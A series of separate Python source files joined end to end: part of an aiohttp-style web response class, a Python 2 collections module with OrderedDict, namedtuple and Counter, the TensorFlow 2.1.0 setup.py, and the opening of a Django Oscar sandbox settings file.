"doesn't make sense, setup content_type first")
if value is None:
self._content_dict.pop('charset', None)
else:
self._content_dict['charset'] = str(value).lower()
self._generate_content_type_header()
def _generate_content_type_header(self, CONTENT_TYPE=hdrs.CONTENT_TYPE):
params = '; '.join("%s=%s" % i for i in self._content_dict.items())
if params:
ctype = self._content_type + '; ' + params
else:
ctype = self._content_type
self.headers[CONTENT_TYPE] = ctype
def _start_pre_check(self, request):
if self._resp_impl is not None:
if self._req is not request:
raise RuntimeError(
'Response has been started with different request.')
else:
return self._resp_impl
else:
return None
def start(self, request):
resp_impl = self._start_pre_check(request)
if resp_impl is not None:
return resp_impl
self._req = request
keep_alive = self._keep_alive
if keep_alive is None:
keep_alive = request.keep_alive
self._keep_alive = keep_alive
resp_impl = self._resp_impl = ResponseImpl(
request._writer,
self._status,
request.version,
not keep_alive,
self._reason)
self._copy_cookies()
if self._compression:
if (self._compression_force or
'deflate' in request.headers.get(
hdrs.ACCEPT_ENCODING, '')):
resp_impl.add_compression_filter()
if self._chunked:
resp_impl.enable_chunked_encoding()
if self._chunk_size:
resp_impl.add_chunking_filter(self._chunk_size)
headers = self.headers.items()
for key, val in headers:
resp_impl.add_header(key, val)
resp_impl.send_headers()
return resp_impl
def write(self, data):
assert isinstance(data, (bytes, bytearray, memoryview)), \
'data argument must be byte-ish (%r)' % type(data)
if self._eof_sent:
raise RuntimeError("Cannot call write() after write_eof()")
if self._resp_impl is None:
raise RuntimeError("Cannot call write() before start()")
if data:
return self._resp_impl.write(data)
else:
return ()
@asyncio.coroutine
def drain(self):
if self._resp_impl is None:
raise RuntimeError("Response has not been started")
yield from self._resp_impl.transport.drain()
@asyncio.coroutine
def write_eof(self):
if self._eof_sent:
return
if self._resp_impl is None:
raise RuntimeError("Response has not been started")
yield from self._resp_impl.write_eof()
self._eof_sent = True
def __repr__(self):
if self.started:
info = "{} {} ".format(self._req.method, self._req.path)
else:
info = "not started"
return "<{} {} {}>".format(self.__class__.__name__,
self.reason, info)
class Response(StreamResponse):
def __init__(self, *, body=None, status=200,
reason=None, text=None, headers=None, content_type=None):
super().__init__(status=status, reason=reason, headers=headers)
if body is not None and text is not None:
raise ValueError("body and text are not allowed together.")
if text is not None:
if hdrs.CONTENT_TYPE not in self.headers:
# fast path for filling headers
if not isinstance(text, str):
raise TypeError('text argument must be str (%r)' %
type(text))
if content_type is None:
content_type = 'text/plain'
self.headers[hdrs.CONTENT_TYPE] = (
content_type + '; charset=utf-8')
self._content_type = content_type
self._content_dict = {'charset': 'utf-8'}
self.body = text.encode('utf-8')
else:
self.text = text
else:
if content_type:
self.content_type = content_type
if body is not None:
self.body = body
else:
self.body = None
@property
def body(self):
return self._body
@body.setter
def body(self, body):
if body is not None and not isinstance(body, bytes):
raise TypeError('body argument must be bytes (%r)' % type(body))
self._body = body
if body is not None:
self.content_length = len(body)
else:
self.content_length = 0
@property
def text(self):
return self._body.decode(self.charset or 'utf-8')
@text.setter
def text(self, text):
if text is not None and not isinstance(text, str):
raise TypeError('text argument must be str (%r)' % type(text))
if self.content_type == 'application/octet-stream':
self.content_type = 'text/plain'
if self.charset is None:
self.charset = 'utf-8'
self.body = text.encode(self.charset)
@asyncio.coroutine
def write_eof(self):
body = self._body
if body is not None:
self.write(body)
yield from super().write_eof()
|
|
__all__ = ['Counter', 'deque', 'defaultdict', 'namedtuple', 'OrderedDict']
# For bootstrapping reasons, the collection ABCs are defined in _abcoll.py.
# They should however be considered an integral part of collections.py.
from _abcoll import *
import _abcoll
__all__ += _abcoll.__all__
from operator import itemgetter as _itemgetter
from keyword import iskeyword as _iskeyword
import sys as _sys
import heapq as _heapq
from itertools import repeat as _repeat, chain as _chain, starmap as _starmap
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
################################################################################
### OrderedDict
################################################################################
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as regular dictionaries.
# The internal self.__map dict maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries, but keyword arguments are not recommended because
their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, PREV=0, NEXT=1, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[PREV]
last[NEXT] = root[PREV] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, PREV=0, NEXT=1, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[NEXT] = link_next
link_next[PREV] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
NEXT, KEY = 1, 2
root = self.__root
curr = root[NEXT]
while curr is not root:
yield curr[KEY]
curr = curr[NEXT]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
PREV, KEY = 0, 2
root = self.__root
curr = root[PREV]
while curr is not root:
yield curr[KEY]
curr = curr[PREV]
def clear(self):
'od.clear() -> None. Remove all items from od.'
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
dict.clear(self)
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) pairs in od'
for k in self:
yield (k, self[k])
update = MutableMapping.update
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
key = next(reversed(self) if last else iter(self))
value = self.pop(key)
return key, value
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S.
If not specified, the value defaults to None.
'''
self = cls()
for key in iterable:
self[key] = value
return self
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self) == len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
'od.__ne__(y) <==> od!=y'
return not self == other
# -- the following methods support python 3.x style dictionary views --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
################################################################################
### namedtuple
################################################################################
def namedtuple(typename, field_names, verbose=False, rename=False):
"""Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', 'x y')
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessable by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
# Parse and validate the field names. Validation serves two purposes,
# generating informative error messages and preventing template injection attacks.
if isinstance(field_names, basestring):
field_names = field_names.replace(',', ' ').split() # names separated by whitespace and/or commas
field_names = tuple(map(str, field_names))
if rename:
names = list(field_names)
seen = set()
for i, name in enumerate(names):
if (not all(c.isalnum() or c == '_' for c in name) or _iskeyword(name)
or not name or name[0].isdigit() or name.startswith('_')
or name in seen):
names[i] = '_%d' % i
seen.add(name)
field_names = tuple(names)
for name in (typename,) + field_names:
if not all(c.isalnum() or c == '_' for c in name):
raise ValueError(
'Type names and field names can only contain alphanumeric characters and underscores: %r' % name)
if _iskeyword(name):
raise ValueError('Type names and field names cannot be a keyword: %r' % name)
if name[0].isdigit():
raise ValueError('Type names and field names cannot start with a number: %r' % name)
seen_names = set()
for name in field_names:
if name.startswith('_') and not rename:
raise ValueError('Field names cannot start with an underscore: %r' % name)
if name in seen_names:
raise ValueError('Encountered duplicate field name: %r' % name)
seen_names.add(name)
# Create and fill-in the class template
numfields = len(field_names)
argtxt = repr(field_names).replace("'", "")[1:-1] # tuple repr without parens or quotes
reprtxt = ', '.join('%s=%%r' % name for name in field_names)
template = '''class %(typename)s(tuple):
'%(typename)s(%(argtxt)s)' \n
__slots__ = () \n
_fields = %(field_names)r \n
def __new__(_cls, %(argtxt)s):
'Create new instance of %(typename)s(%(argtxt)s)'
return _tuple.__new__(_cls, (%(argtxt)s)) \n
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
'Make a new %(typename)s object from a sequence or iterable'
result = new(cls, iterable)
if len(result) != %(numfields)d:
raise TypeError('Expected %(numfields)d arguments, got %%d' %% len(result))
return result \n
def __repr__(self):
'Return a nicely formatted representation string'
return '%(typename)s(%(reprtxt)s)' %% self \n
def _asdict(self):
'Return a new OrderedDict which maps field names to their values'
return OrderedDict(zip(self._fields, self)) \n
__dict__ = property(_asdict) \n
def _replace(_self, **kwds):
'Return a new %(typename)s object replacing specified fields with new values'
result = _self._make(map(kwds.pop, %(field_names)r, _self))
if kwds:
raise ValueError('Got unexpected field names: %%r' %% kwds.keys())
return result \n
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return tuple(self) \n\n''' % locals()
for i, name in enumerate(field_names):
template += " %s = _property(_itemgetter(%d), doc='Alias for field number %d')\n" % (name, i, i)
if verbose:
print template
# Execute the template string in a temporary namespace and
# support tracing utilities by setting a value for frame.f_globals['__name__']
namespace = dict(_itemgetter=_itemgetter, __name__='namedtuple_%s' % typename,
OrderedDict=OrderedDict, _property=property, _tuple=tuple)
try:
exec template in namespace
except SyntaxError, e:
raise SyntaxError(e.message + ':\n' + template)
result = namespace[typename]
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
result.__module__ = _sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return result
########################################################################
### Counter
########################################################################
class Counter(dict):
'''Dict subclass for counting hashable items. Sometimes called a bag
or multiset. Elements are stored as dictionary keys and their counts
are stored as dictionary values.
>>> c = Counter('abcdeabcdabcaba') # count elements from a string
>>> c.most_common(3) # three most common elements
[('a', 5), ('b', 4), ('c', 3)]
>>> sorted(c) # list all unique elements
['a', 'b', 'c', 'd', 'e']
>>> ''.join(sorted(c.elements())) # list elements with repetitions
'aaaaabbbbcccdde'
>>> sum(c.values()) # total of all counts
15
>>> c['a'] # count of letter 'a'
5
>>> for elem in 'shazam': # update counts from an iterable
... c[elem] += 1 # by adding 1 to each element's count
>>> c['a'] # now there are seven 'a'
7
>>> del c['b'] # remove all 'b'
>>> c['b'] # now there are zero 'b'
0
>>> d = Counter('simsalabim') # make another counter
>>> c.update(d) # add in the second counter
>>> c['a'] # now there are nine 'a'
9
>>> c.clear() # empty the counter
>>> c
Counter()
Note: If a count is set to zero or reduced to zero, it will remain
in the counter until the entry is deleted or the counter is cleared:
>>> c = Counter('aaabbc')
>>> c['b'] -= 2 # reduce the count of 'b' by two
>>> c.most_common() # 'b' is still in, but its count is zero
[('a', 3), ('c', 1), ('b', 0)]
'''
# References:
# http://en.wikipedia.org/wiki/Multiset
# http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
# http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
# http://code.activestate.com/recipes/259174/
# Knuth, TAOCP Vol. II section 4.6.3
def __init__(self, iterable=None, **kwds):
'''Create a new, empty Counter object. And if given, count elements
from an input iterable. Or, initialize the count from another mapping
of elements to their counts.
>>> c = Counter() # a new, empty counter
>>> c = Counter('gallahad') # a new counter from an iterable
>>> c = Counter({'a': 4, 'b': 2}) # a new counter from a mapping
>>> c = Counter(a=4, b=2) # a new counter from keyword args
'''
super(Counter, self).__init__()
self.update(iterable, **kwds)
def __missing__(self, key):
'The count of elements not in the Counter is zero.'
# Needed so that self[missing_item] does not raise KeyError
return 0
def most_common(self, n=None):
'''List the n most common elements and their counts from the most
common to the least. If n is None, then list all element counts.
>>> Counter('abcdeabcdabcaba').most_common(3)
[('a', 5), ('b', 4), ('c', 3)]
'''
# Emulate Bag.sortedByCount from Smalltalk
if n is None:
return sorted(self.iteritems(), key=_itemgetter(1), reverse=True)
return _heapq.nlargest(n, self.iteritems(), key=_itemgetter(1))
def elements(self):
'''Iterator over elements repeating each as many times as its count.
>>> c = Counter('ABCABC')
>>> sorted(c.elements())
['A', 'A', 'B', 'B', 'C', 'C']
# Knuth's example for prime factors of 1836: 2**2 * 3**3 * 17**1
>>> prime_factors = Counter({2: 2, 3: 3, 17: 1})
>>> product = 1
>>> for factor in prime_factors.elements(): # loop over factors
... product *= factor # and multiply them
>>> product
1836
Note, if an element's count has been set to zero or is a negative
number, elements() will ignore it.
'''
# Emulate Bag.do from Smalltalk and Multiset.begin from C++.
return _chain.from_iterable(_starmap(_repeat, self.iteritems()))
# Override dict methods where necessary
@classmethod
def fromkeys(cls, iterable, v=None):
# There is no equivalent method for counters because setting v=1
# means that no element can have a count greater than one.
raise NotImplementedError(
'Counter.fromkeys() is undefined. Use Counter(iterable) instead.')
def update(self, iterable=None, **kwds):
'''Like dict.update() but add counts instead of replacing them.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.update('witch') # add elements from another iterable
>>> d = Counter('watch')
>>> c.update(d) # add elements from another counter
>>> c['h'] # four 'h' in which, witch, and watch
4
'''
# The regular dict.update() operation makes no sense here because the
# replace behavior results in the some of original untouched counts
# being mixed-in with all of the other counts for a mismash that
# doesn't have a straight-forward interpretation in most counting
# contexts. Instead, we implement straight-addition. Both the inputs
# and outputs are allowed to contain zero and negative counts.
if iterable is not None:
if isinstance(iterable, Mapping):
if self:
self_get = self.get
for elem, count in iterable.iteritems():
self[elem] = self_get(elem, 0) + count
else:
super(Counter, self).update(iterable) # fast path when counter is empty
else:
self_get = self.get
for elem in iterable:
self[elem] = self_get(elem, 0) + 1
if kwds:
self.update(kwds)
def subtract(self, iterable=None, **kwds):
'''Like dict.update() but subtracts counts instead of replacing them.
Counts can be reduced below zero. Both the inputs and outputs are
allowed to contain zero and negative counts.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.subtract('witch') # subtract elements from another iterable
>>> c.subtract(Counter('watch')) # subtract elements from another counter
>>> c['h'] # 2 in which, minus 1 in witch, minus 1 in watch
0
>>> c['w'] # 1 in which, minus 1 in witch, minus 1 in watch
-1
'''
if iterable is not None:
self_get = self.get
if isinstance(iterable, Mapping):
for elem, count in iterable.items():
self[elem] = self_get(elem, 0) - count
else:
for elem in iterable:
self[elem] = self_get(elem, 0) - 1
if kwds:
self.subtract(kwds)
def copy(self):
'Return a shallow copy.'
return self.__class__(self)
def __reduce__(self):
return self.__class__, (dict(self),)
def __delitem__(self, elem):
'Like dict.__delitem__() but does not raise KeyError for missing values.'
if elem in self:
super(Counter, self).__delitem__(elem)
def __repr__(self):
if not self:
return '%s()' % self.__class__.__name__
items = ', '.join(map('%r: %r'.__mod__, self.most_common()))
return '%s({%s})' % (self.__class__.__name__, items)
# Multiset-style mathematical operations discussed in:
# Knuth TAOCP Volume II section 4.6.3 exercise 19
# and at http://en.wikipedia.org/wiki/Multiset
#
# Outputs guaranteed to only include positive counts.
#
# To strip negative and zero counts, add-in an empty counter:
# c += Counter()
def __add__(self, other):
'''Add counts from two counters.
>>> Counter('abbb') + Counter('bcc')
Counter({'b': 4, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count + other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __sub__(self, other):
''' Subtract count, but keep only results with positive counts.
>>> Counter('abbbc') - Counter('bccd')
Counter({'b': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count - other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count < 0:
result[elem] = 0 - count
return result
def __or__(self, other):
'''Union is the maximum of value in either of the input counters.
>>> Counter('abbb') | Counter('bcc')
Counter({'b': 3, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = other_count if count < other_count else count
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __and__(self, other):
''' Intersection is the minimum of corresponding counts.
>>> Counter('abbb') & Counter('bcc')
Counter({'b': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = count if count < other_count else other_count
if newcount > 0:
result[elem] = newcount
return result
if __name__ == '__main__':
# verify that instances can be pickled
from cPickle import loads, dumps
Point = namedtuple('Point', 'x, y', True)
p = Point(x=10, y=20)
assert p == loads(dumps(p))
# test and demonstrate ability to override methods
class Point(namedtuple('Point', 'x y')):
__slots__ = ()
@property
def hypot(self):
return (self.x ** 2 + self.y ** 2) ** 0.5
def __str__(self):
return 'Point: x=%6.3f y=%6.3f hypot=%6.3f' % (self.x, self.y, self.hypot)
for p in Point(3, 4), Point(14, 5 / 7.):
print p
class Point(namedtuple('Point', 'x y')):
'Point class with optimized _make() and _replace() without error-checking'
__slots__ = ()
_make = classmethod(tuple.__new__)
def _replace(self, _map=map, **kwds):
return self._make(_map(kwds.get, ('x', 'y'), self))
print Point(11, 22)._replace(x=100)
Point3D = namedtuple('Point3D', Point._fields + ('z',))
print Point3D.__doc__
import doctest
TestResults = namedtuple('TestResults', 'failed attempted')
print TestResults(*doctest.testmod())
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License..
# ==============================================================================
"""TensorFlow is an open source machine learning framework for everyone.
TensorFlow is an open source software library for high performance numerical
computation. Its flexible architecture allows easy deployment of computation
across a variety of platforms (CPUs, GPUs, TPUs), and from desktops to clusters
of servers to mobile and edge devices.
Originally developed by researchers and engineers from the Google Brain team
within Google's AI organization, it comes with strong support for machine
learning and deep learning and the flexible numerical computation core is used
across many other scientific domains.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fnmatch
import os
import re
import sys
from setuptools import Command
from setuptools import find_packages
from setuptools import setup
from setuptools.command.install import install as InstallCommandBase
from setuptools.dist import Distribution
DOCLINES = __doc__.split('\n')
# This version string is semver compatible, but incompatible with pip.
# For pip, we will remove all '-' characters from this string, and use the
# result for pip.
# Also update tensorflow/tensorflow.bzl and
# tensorflow/core/public/version.h
_VERSION = '2.1.0'
REQUIRED_PACKAGES = [
'absl-py >= 0.7.0',
'astunparse == 1.6.3',
'backports.weakref >= 1.0rc1;python_version<"3.4"',
'enum34 >= 1.1.6;python_version<"3.4"',
'gast == 0.3.3',
'google_pasta >= 0.1.8',
'h5py >= 2.10.0, < 2.11.0',
'keras_preprocessing >= 1.1.0',
'numpy >= 1.16.0, < 2.0',
'opt_einsum >= 2.3.2',
'protobuf >= 3.8.0',
'tensorboard >= 2.1.0, < 2.2.0',
'tensorflow_estimator >= 2.1.0, < 2.2.0',
'termcolor >= 1.1.0',
'wrapt >= 1.11.1',
# python3 requires wheel 0.26
'wheel >= 0.26;python_version>="3"',
'wheel;python_version<"3"',
# mock comes with unittest.mock for python3, need to install for python2
'mock >= 2.0.0;python_version<"3"',
# functools comes with python3, need to install the backport for python2
'functools32 >= 3.2.3;python_version<"3"',
'six >= 1.12.0',
# scipy < 1.4.1 causes segfaults due to pybind11
# Latest scipy pip for py2 is scipy==1.2.2
'scipy == 1.4.1;python_version>="3"',
'scipy == 1.2.2;python_version<"3"',
]
if sys.byteorder == 'little':
# grpcio does not build correctly on big-endian machines due to lack of
# BoringSSL support.
# See https://github.com/tensorflow/tensorflow/issues/17882.
REQUIRED_PACKAGES.append('grpcio >= 1.8.6')
project_name = 'tensorflow'
if '--project_name' in sys.argv:
project_name_idx = sys.argv.index('--project_name')
project_name = sys.argv[project_name_idx + 1]
sys.argv.remove('--project_name')
sys.argv.pop(project_name_idx)
# tf-nightly should depend on tb-nightly
if 'tf_nightly' in project_name:
for i, pkg in enumerate(REQUIRED_PACKAGES):
if 'tensorboard' in pkg:
REQUIRED_PACKAGES[i] = 'tb-nightly >= 2.2.0a0, < 2.3.0a0'
elif 'tensorflow_estimator' in pkg and '2.0' in project_name:
REQUIRED_PACKAGES[i] = 'tensorflow-estimator-2.0-preview'
elif 'tensorflow_estimator' in pkg:
REQUIRED_PACKAGES[i] = 'tf-estimator-nightly'
# pylint: disable=line-too-long
CONSOLE_SCRIPTS = [
'toco_from_protos = tensorflow.lite.toco.python.toco_from_protos:main',
'tflite_convert = tensorflow.lite.python.tflite_convert:main',
'toco = tensorflow.lite.python.tflite_convert:main',
'saved_model_cli = tensorflow.python.tools.saved_model_cli:main',
# We need to keep the TensorBoard command, even though the console script
# is now declared by the tensorboard pip package. If we remove the
# TensorBoard command, pip will inappropriately remove it during install,
# even though the command is not removed, just moved to a different wheel.
'tensorboard = tensorboard.main:run_main',
'tf_upgrade_v2 = tensorflow.tools.compatibility.tf_upgrade_v2_main:main',
'estimator_ckpt_converter = tensorflow_estimator.python.estimator.tools.checkpoint_converter:main',
]
# pylint: enable=line-too-long
# Only keep freeze_graph console script in 1.X.
if _VERSION.startswith('1.') and '_2.0' not in project_name:
CONSOLE_SCRIPTS.append(
'freeze_graph = tensorflow.python.tools.freeze_graph:run_main')
# remove the tensorboard console script if building tf_nightly
if 'tf_nightly' in project_name:
CONSOLE_SCRIPTS.remove('tensorboard = tensorboard.main:run_main')
TEST_PACKAGES = [
'scipy >= 0.15.1',
]
class BinaryDistribution(Distribution):
def has_ext_modules(self):
return True
class InstallCommand(InstallCommandBase):
"""Override the dir where the headers go."""
def finalize_options(self):
ret = InstallCommandBase.finalize_options(self)
self.install_headers = os.path.join(self.install_purelib, 'tensorflow_core',
'include')
self.install_lib = self.install_platlib
return ret
class InstallHeaders(Command):
"""Override how headers are copied.
The install_headers that comes with setuptools copies all files to
the same directory. But we need the files to be in a specific directory
hierarchy for -I <include_dir> to work correctly.
"""
description = 'install C/C++ header files'
user_options = [('install-dir=', 'd',
'directory to install header files to'),
('force', 'f',
'force installation (overwrite existing files)'),
]
boolean_options = ['force']
def initialize_options(self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options(self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def mkdir_and_copy_file(self, header):
install_dir = os.path.join(self.install_dir, os.path.dirname(header))
# Get rid of some extra intervening directories so we can have fewer
# directories for -I
install_dir = re.sub('/google/protobuf_archive/src', '', install_dir)
install_dir = re.sub('/include/tensorflow_core/', '/include/tensorflow/',
install_dir)
# Copy external code headers into tensorflow_core/include.
# A symlink would do, but the wheel file that gets created ignores
# symlink within the directory hierarchy.
# NOTE(keveman): Figure out how to customize bdist_wheel package so
# we can do the symlink.
external_header_locations = [
'tensorflow_core/include/external/eigen_archive/',
'tensorflow_core/include/external/com_google_absl/',
]
for location in external_header_locations:
if location in install_dir:
extra_dir = install_dir.replace(location, '')
if not os.path.exists(extra_dir):
self.mkpath(extra_dir)
self.copy_file(header, extra_dir)
if not os.path.exists(install_dir):
self.mkpath(install_dir)
return self.copy_file(header, install_dir)
def run(self):
hdrs = self.distribution.headers
if not hdrs:
return
self.mkpath(self.install_dir)
for header in hdrs:
(out, _) = self.mkdir_and_copy_file(header)
self.outfiles.append(out)
def get_inputs(self):
return self.distribution.headers or []
def get_outputs(self):
return self.outfiles
def find_files(pattern, root):
"""Return all the files matching pattern below root dir."""
for dirpath, _, files in os.walk(root):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(dirpath, filename)
so_lib_paths = [
i for i in os.listdir('.')
if os.path.isdir(i) and fnmatch.fnmatch(i, '_solib_*')
]
matches = []
for path in so_lib_paths:
matches.extend(
['../' + x for x in find_files('*', path) if '.py' not in x]
)
if os.name == 'nt':
EXTENSION_NAME = 'python/_pywrap_tensorflow_internal.pyd'
else:
EXTENSION_NAME = 'python/_pywrap_tensorflow_internal.so'
headers = (
list(find_files('*.h', 'tensorflow_core/compiler')) +
list(find_files('*.h', 'tensorflow_core/core')) +
list(find_files('*.h', 'tensorflow_core/stream_executor')) +
list(find_files('*.h', 'google/com_google_protobuf/src')) +
list(find_files('*.inc', 'google/com_google_protobuf/src')) +
list(find_files('*', 'third_party/eigen3')) + list(
find_files('*.h', 'tensorflow_core/include/external/com_google_absl')) +
list(
find_files('*.inc', 'tensorflow_core/include/external/com_google_absl'))
+ list(find_files('*', 'tensorflow_core/include/external/eigen_archive')))
setup(
name=project_name,
version=_VERSION.replace('-', ''),
description=DOCLINES[0],
long_description='\n'.join(DOCLINES[2:]),
url='https://www.tensorflow.org/',
download_url='https://github.com/tensorflow/tensorflow/tags',
author='Google Inc.',
author_email='packages@tensorflow.org',
# Contained modules and scripts.
packages=find_packages(),
entry_points={
'console_scripts': CONSOLE_SCRIPTS,
},
headers=headers,
install_requires=REQUIRED_PACKAGES,
tests_require=REQUIRED_PACKAGES + TEST_PACKAGES,
# Add in any packaged data.
include_package_data=True,
package_data={
'tensorflow': [
EXTENSION_NAME,
] + matches,
},
zip_safe=False,
distclass=BinaryDistribution,
cmdclass={
'install_headers': InstallHeaders,
'install': InstallCommand,
},
# PyPI package information.
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
license='Apache 2.0',
keywords='tensorflow tensor machine learning',
)
|
|
import os
# Path helper
location = lambda x: os.path.join(
os.path.dirname(os.path.realpath(__file__)), x)
USE_TZ = True
DEBUG = True
TEMPLATE_DEBUG = True
SQL_DEBUG = True
ALLOWED_HOSTS = ['latest.oscarcommerce.com',
'master.oscarcommerce.com']
# This is needed for the hosted version of the sandbox
ADMINS = (
('David Winterbottom', 'david.winterbottom@gmail.com'),
)
EMAIL_SUBJECT_PREFIX = '[Oscar sandbox] '
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
MANAGERS = ADMINS
# Use a Sqlite database by default
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': location('db.sqlite'),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
'ATOMIC_REQUESTS': True
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
# Prevent Django 1.7+ from showing a warning regarding a changed default test
# runner. The Oscar test suite is run with nose, so it does not matter.
